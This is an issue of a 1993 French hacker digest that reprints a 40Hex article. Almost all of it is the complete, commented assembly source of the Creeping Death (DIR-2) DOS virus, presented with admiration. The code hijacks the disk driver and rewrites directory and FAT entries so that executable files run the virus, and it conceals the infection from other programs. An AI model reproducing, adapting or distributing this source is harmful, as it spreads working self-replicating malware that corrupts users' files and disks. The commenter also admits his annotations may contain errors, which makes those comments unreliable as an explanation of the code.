Chaos Digest Mercredi 9 Juin 1993 Volume 1 : Numero 51 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.51 (9 Juin 1993) File 1--40H VMag Number 6 Volume 2 Issue 2 #00A (reprint) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Number 6 Volume 2 Issue 2 #00A (reprint) 40Hex Number 6 Volume 2 Issue 2 File 00A Welcome to this issue's VIRUS SPOTLITE, the infamous Creeping Death(dir2). This is one of the most impressive viruses out there, and VirusSoft looks to be a promising group in the future. Unfortunately, the source code we obtained had almost no comments. Dark Angel commented it as best as he possibly could, but I think it is safe to say that there may be a few discrepancies. Nonetheless, it was an excellent job, kudos to DA. Although I am writing this header, I had nothing to do with the commenting, so Dark Angel gets all the credit. -)GHeap ------------------------------------------------------------------------------ - ; Dark Angel's comments: I spent my entire waking hours looking at this virus. ; I love it. It is my life. I worship the drive it ; infects. Take a look at it. Let not my troubles be ; in vain. Why did I do this? I sacrifice my life for ; the benefit of 40Hex. If you don't read this, I'm ; gonna go join [NuKE]. ; Creeping Death V 1.0 ; ; (C) Copyright 1991 by VirusSoft Corp. i13org = 5f8h i21org = 5fch dir_2 segment byte public assume cs:dir_2, ds:dir_2 org 100h start: mov sp,600h ;Set up the stack pointer inc word ptr counter ;Generation counter xor cx,cx mov ds,cx ;DS points to interrupt table lds ax, ds:[0c1h] ;Find interrupt 30h add ax,21h ;Change it to Int 21h push ds ;Save it on stack for use by push ax ;subroutine "jump" mov ah,30h ;Get DOS version call jump cmp al,4 ;DOS 4.X+ : SI = 0 sbb si,si ;DOS 2/3 : SI = -1 mov byte ptr [drive+2],byte ptr -1 ;Initialise last drive to ;"never accessed" mov bx,60h ;Adjust memory in ES to mov ah,4ah ;BX paragraphs. call jump mov ah,52h ;Get DOS List of Lists call jump ;to ES:BX push es:[bx-2] ;Save Segment of first MCB lds bx,es:[bx] ;DS:BX -> 1st DPB ; (Drive parameter block) search: mov ax,[bx+si+15h] ;Get segment of device driver cmp ax,70h ;Is it CONFIG? (I think) jne next ;If not, try again xchg ax,cx ;Move driver segment to CX mov [bx+si+18h],byte ptr -1 ;Flag block must be rebuilt mov di,[bx+si+13h] ;Save offset of device driver ;Original device driver ;address in CX:DI mov [bx+si+13h],offset header ;Replace with our own mov [bx+si+15h],cs ; (header) next: lds bx,[bx+si+19h] ;Get next device block cmp bx,-1 ;Is it the last one? jne search ;If not, search it jcxz install pop ds ;Restore segment of first mov ax,ds ;MCB add ax,ds:[3] ;Go to next MCB inc ax ;AX = segment next MCB mov dx,cs ;DX = MCB owning current dec dx ; program cmp ax,dx ;Are these the same? jne no_boot ;If not, we are not currently ;in the middle of a reboot add word ptr ds:[3],61h ;Increase length owned by ;MCB by 1552 bytes no_boot: mov ds,dx ;DS = MCB owning current ;program mov word ptr ds:[1],8 ;Set owner = DOS mov ds,cx ;DS = segment of original ; device driver les ax,[di+6] ;ES = offset int handler ;AX = offset strategy entry mov word ptr cs:str_block,ax ;Save entry point mov word ptr cs:int_block,es ;And int block for use in ;function _in cld ;Scan for the write mov si,1 ;function in the scan: dec si ;original device driver lodsw cmp ax,1effh jne scan mov ax,2cah ;Wicked un-yar place o' cmp [si+4],ax ;doom. je right cmp [si+5],ax jne scan right: lodsw push cs pop es mov di,offset modify+1 ;Save address of patch stosw ;area so it can be changed xchg ax,si ;later. mov di,offset i13org ;This is in the stack, but cli ;it is used by "i13pr" movsw movsw mov dx,0c000h ;Scan for hard disk ROM ;Start search @ segment C000h fdsk1: mov ds,dx ;Load up the segment xor si,si ;atart at offset 0000h lodsw ;Scan for the signature cmp ax,0aa55h ;Is it the signature? jne fdsk4 ;If not, change segment cbw ;clear AH lodsb ;load a byte to AL mov cl,9 sal ax,cl ;Shift left, 0 filled fdsk2: cmp [si],6c7h jne fdsk3 cmp word ptr [si+2],4ch jne fdsk3 push dx ;Save the segment push [si+4] ;and offset on stack jmp short death ;for use by i13pr install: int 20h file: db "c:",255,0 fdsk3: inc si ;Increment search offset cmp si,ax ;If we are not too high, jb fdsk2 ;try again fdsk4: inc dx ;Increment search segment cmp dh,0f0h ;If we are not in high jb fdsk1 ;memory, try again sub sp,4 ;effectively push dummy vars. death: push cs ;on stack for use by i13pr pop ds mov bx,ds:[2ch] ;Get environment from PSP mov es,bx mov ah,49h ;Release it (to save memory) call jump xor ax,ax test bx,bx ;Is BX = 0? jz boot ;If so, we are booting now mov di,1 ;and not running a file seek: dec di ;Search for end of scasw ;the environment block jne seek lea si,[di+2] ;SI points to filename jmp short exec ;(in DOS 3.X+) ;Execute that file boot: mov es,ds:[16h] ;get PSP of parent mov bx,es:[16h] ;get PSP of parent dec bx ;go to its MCB xor si,si exec: push bx mov bx,offset param ;Set up parameter block ;for EXEC function mov [bx+4],cs ;segment to command line mov [bx+8],cs ;segment to 1st FCB mov [bx+12],cs ;segment to 2nd FCB pop ds push cs pop es mov di,offset f_name push di ;Save filename offset mov cx,40 ;Copy the filename to rep movsw ;the buffer push cs pop ds mov ah,3dh ;Handle open file mov dx,offset file ;"c:",0 call jump pop dx ;DS:DX -> filename mov ax,4b00h ;Load and Execute call jump ;ES:BX = param block mov ah,4dh ;Get errorlevel call jump mov ah,4ch ;Terminate jump: pushf ;Simulate an interrupt 21h call dword ptr cs:[i21org] ret ;--------Installation complete i13pr: mov ah,3 ;Write AL sectors from ES:BX jmp dword ptr cs:[i13org] ;to track CH, sector CL, ;head DH, drive DL main: push ax ; driver push cx ; strategy block push dx push ds push si push di push es ;Move segment of parameter pop ds ;block to DS mov al,[bx+2] ;[bx+2] holds command code cmp al,4 ;Input (read) je input cmp al,8 ;Output (write) je output cmp al,9 ;Output (write) with verify je output call in_ ;Call original device cmp al,2 ;Request build BPB jne ppp ;If none of the above, exit lds si,[bx+12h] ;DS:SI point to BPB table mov di,offset bpb_buf ;Replace old pointer with mov es:[bx+12h],di ;a pointer to our own mov es:[bx+14h],cs ;BPB table push es ;Save segment of parameters push cs pop es mov cx,16 ;Copy the old BPB table to rep movsw ;our own pop es ;Restore parameter segment push cs pop ds mov al,[di+2-32] ;AL = sectors per allocation cmp al,2 ; unit. If less than adc al,0 ; 2, increment cbw ;Extend sign to AH (clear AH) cmp word ptr [di+8-32],0 ;Is total number sectors = 0? je m32 ;If so, big partition (>32MB) sub [di+8-32],ax ;Decrease space of disk by ;one allocation unit(cluster) jmp short ppp ;Exit m32: sub [di+15h-32],ax ;Handle large partitions sbb word ptr [di+17h-32],0 ppp: pop di pop si pop ds pop dx pop cx pop ax rts: retf ;We are outta here! output: mov cx,0ff09h call check ;is it a new disk? jz inf_sec ;If not, go away call in_ ;Call original device handler jmp short inf_dsk inf_sec: jmp _inf_sec read: jmp _read read_: add sp,16 ;Restore the stack jmp short ppp ;Leave device driver input: call check ;Is it a new disk? jz read ;If not, leave inf_dsk: mov byte ptr [bx+2],4 ;Set command code to READ cld lea si,[bx+0eh] ;Load from buffer address mov cx,8 ;Save device driver request save: lodsw ;on the stack push ax loop save mov word ptr [bx+14h],1 ;Starting sector number = 1 ;(Read 1st FAT) call driver ;Read one sector jnz read_ ;If error, exit mov byte ptr [bx+2],2 ;Otherwise build BPB call in_ ;Have original driver do the ;work lds si,[bx+12h] ;DS:SI points to BPB table mov ax,[si+6] ;Number root directory entries add ax,15 ;Round up mov cl,4 shr ax,cl ;Divide by 16 to find sectors ;of root directory mov di,[si+0bh] ;DI = sectors/FAT add di,di ;Double for 2 FATs stc ;Add one for boot record adc di,ax ;Add sector size of root dir push di ;to find starting sector of ;data (and read) cwd ;Clear DX mov ax,[si+8] ;AX = total sectors test ax,ax ;If it is zero, then we have jnz more ;an extended partition(>32MB) mov ax,[si+15h] ;Load DX:AX with total number mov dx,[si+17h] ;of sectors more: xor cx,cx sub ax,di ;Calculate FAT entry for last ;sector of disk sbb dx,cx mov cl,[si+2] ;CL = sectors/cluster div cx ;AX = cluster # cmp cl,2 ;If there is more than 1 sbb ax,-1 ;cluster/sector, add one push ax ;Save cluster number call convert ;AX = sector number to read ;DX = offset in sector AX ; of FAT entry ;DI = mask for EOF marker mov byte ptr es:[bx+2],4 ;INPUT (read) mov es:[bx+14h],ax ;Starting sector = AX call driver ;One sector only again: lds si,es:[bx+0eh] ;DS:SI = buffer address add si,dx ;Go to FAT entry sub dh,cl ;Calculate a new encryption adc dx,ax ;value mov word ptr cs:gad+1,dx ;Change the encryption value cmp cl,1 ;If there is 0 cluster/sector je small_ ;then jump to "small_" mov ax,[si] ;Load AX with offset of FAT ;entry and ax,di ;Mask it with value from ;"convert" then test to see ;if the sector is fine cmp ax,0fff7h ;16 bit reserved/bad je bad cmp ax,0ff7h ;12 bit reserved/bad je bad cmp ax,0ff70h ;12 bit reserved/bad jne ok bad: pop ax ;Tried to replicate on a bad dec ax ;cluster. Try again on a push ax ;lower one. call convert ;Find where it is in the FAT jmp short again ;and try once more small_: not di ;Reverse mask bits and [si],di ;Clear other bits pop ax ;AX = cluster number push ax inc ax ;Need to do 2 consecutive push ax ;bytes mov dx,0fh test di,dx jz here inc dx ;Multiply by 16 mul dx here: or [si],ax ;Set cluster to next pop ax ;Restore cluster of write call convert ;Calculate buffer offset mov si,es:[bx+0eh] ;Go to FAT entry (in buffer) add si,dx mov ax,[si] and ax,di ok: mov dx,di ;DI = mask from "convert" dec dx and dx,di ;Yerg! not di and [si],di or [si],dx ;Set [si] to DI cmp ax,dx ;Did we change the FAT? pop ax ;i.e. Are we already on this pop di ;disk? mov word ptr cs:pointer+1,ax ;Our own starting cluster je _read_ ;If we didn't infect, then ;leave the routine. Oh ;welp-o. mov dx,[si] push ds push si call write ;Update the FAT pop si pop ds jnz _read_ ;Quit if there's an error call driver cmp [si],dx jne _read_ dec ax dec ax mul cx ;Multiply by sectors/cluster ;to find the sector of the ;write add ax,di adc dx,0 push es pop ds mov word ptr [bx+12h],2 ;Byte/sector count mov [bx+14h],ax ;Starting sector # test dx,dx jz less mov word ptr [bx+14h],-1 ;Flag extended partition mov [bx+1ah],ax ;Handle the sector of the mov [bx+1ch],dx ;extended partition less: mov [bx+10h],cs ;Transfer address segment mov [bx+0eh],100h ;and the offset (duh) call write ;Zopy ourselves! ;(We want to travel) _read_: std lea di,[bx+1ch] ;Restore device driver header mov cx,8 ;from the stack load: pop ax stosw loop load _read: call in_ ;Call original device handler mov cx,9 _inf_sec: mov di,es:[bx+12h] ;Bytes/Sector lds si,es:[bx+0eh] ;DS:SI = pointer to buffer sal di,cl ;Multiply by 512 ;DI = byte count xor cl,cl add di,si ;Go to address in the buffer xor dl,dl ;Flag for an infection in ;function find push ds push si call find ;Infect the directory jcxz no_inf call write ;Write it back to the disk and es:[bx+4],byte ptr 07fh ;Clear error bit in status ;word no_inf: pop si pop ds inc dx ;Flag for a decryption in ;function find call find ;Return right information to ;calling program jmp ppp ;--------Subroutines find: mov ax,[si+8] ;Check filename extension cmp ax,"XE" ;in directory structure jne com cmp [si+10],al je found com: cmp ax,"OC" jne go_on cmp byte ptr [si+10],"M" jne go_on found: test [si+1eh],0ffc0h ; >4MB ;Check file size high word jnz go_on ;to see if it is too big test [si+1dh],03ff8h ; <2048B ;Check file size low word jz go_on ;to see if it is too small test [si+0bh],byte ptr 1ch ;Check attribute for subdir, jnz go_on ;volume label or system file test dl,dl ;If none of these, check DX jnz rest ;If not 0, decrypt pointer: mov ax,1234h ;mov ax, XX modified elsewhere cmp ax,[si+1ah] ;Check for same starting ;cluster number as us je go_on ;If it is, then try another xchg ax,[si+1ah] ;Otherwise make it point to ;us. gad: xor ax,1234h ;Encrypt their starting ;cluster mov [si+14h],ax ;And put it in area reserved ;by DOS for no purpose loop go_on ;Try another file rest: xor ax,ax ;Disinfect the file xchg ax,[si+14h] ;Get starting cluster xor ax,word ptr cs:gad+1 ;Decrypt the starting cluster mov [si+1ah],ax ;and put it back go_on: db 2eh,0d1h,6 ;rol cs:[gad+1], 1 dw offset gad+1 ;Change encryption and add si,32 ;go to next file cmp di,si ;If it is not past the end of jne find ;the buffer, then try again ret ;Otherwise quit check: mov ah,[bx+1] ;ah = unit code (block device ; only) drive: cmp ah,-1 ;cmp ah, XX can change. ;Compare with the last call ;-1 is just a dummy ;impossible value that will ;force the change to be true mov byte ptr cs:[drive+2],ah ;Save this call's drive jne changed ;If not the same as last call ;media has changed push [bx+0eh] ;If it is the same physical ;drive, see if floppy has ;been changed mov byte ptr [bx+2],1 ;Tell original driver to do a call in_ ;media check (block only) cmp byte ptr [bx+0eh],1 ;Returns 1 in [bx+0eh] if pop [bx+0eh] ;media has not been changed mov [bx+2],al ;Restore command code changed: ret ;CF,ZF set if media has not ;been changed, not set if ;has been changed or we don't ;know write: cmp byte ptr es:[bx+2],8 ;If we want OUTPUT, go to jae in_ ;original device handler ;and return to caller mov byte ptr es:[bx+2],4 ;Otherwise, request INPUT mov si,70h mov ds,si ;DS = our segment modify: mov si,1234h ;Address is changed elsewhere push [si] push [si+2] mov [si],offset i13pr mov [si+2],cs call in_ ;Call original device handler pop [si+2] pop [si] ret driver: mov word ptr es:[bx+12h],1 ;One sector in_: ;in_ first calls the strategy ;of the original device ;driver and then calls the ;interrupt handler db 09ah ;CALL FAR PTR str_block: dw ?,70h ;address db 09ah ;CALL FAR PTR int_block: dw ?,70h ;address test es:[bx+4],byte ptr 80h ;Was there an error? ret convert: cmp ax,0ff0h ;0FFF0h if 12 bit FAT jae fat_16 ;0FF0h = reserved cluster mov si,3 ;12 bit FAT xor word ptr cs:[si+gad-1],si ;Change the encryption value mul si ;Multiply by 3 and shr ax,1 ;divide by 2 mov di,0fffh ;Mark it EOF (low 12 bits) jnc cont ;if it is even, continue mov di,0fff0h ;otherwise, mark it EOF (high jmp short cont ;12 bits) and then continue fat_16: mov si,2 ;16 bit FAT mul si ;Double cluster # mov di,0ffffh ;Mark it as end of file cont: mov si,512 div si ;AX = sector number ;(relative to start of FAT) ;DX = offset in sector AX header: inc ax ;Increment AX to account for ret ;boot record counter: dw 0 dw 842h ;Attribute ; Block device ; DOS 3 OPEN/CLOSE removable ; media calls supported ; Generic IOCTL call supported ;Supports 32 bit sectors dw offset main ;Strategy routine dw offset rts ;Interrupt routine (rtf) db 7fh ;Number of subunits supported ;by this driver. Wow, lookit ;it -- it's so large and juicy ; Parameter block format: ; 0 WORD Segment of environment ; 2 DWORD pointer to command line ; 6 DWORD pointer to 1st default FCB ;10 DWORD pointer to 2nd default FCB param: dw 0,80h,?,5ch,?,6ch,? bpb_buf: db 32 dup(?) f_name: db 80 dup(?) ;--------The End. dir_2 ends end start MsDos ------------------------------ End of Chaos Digest #1.51 ************************************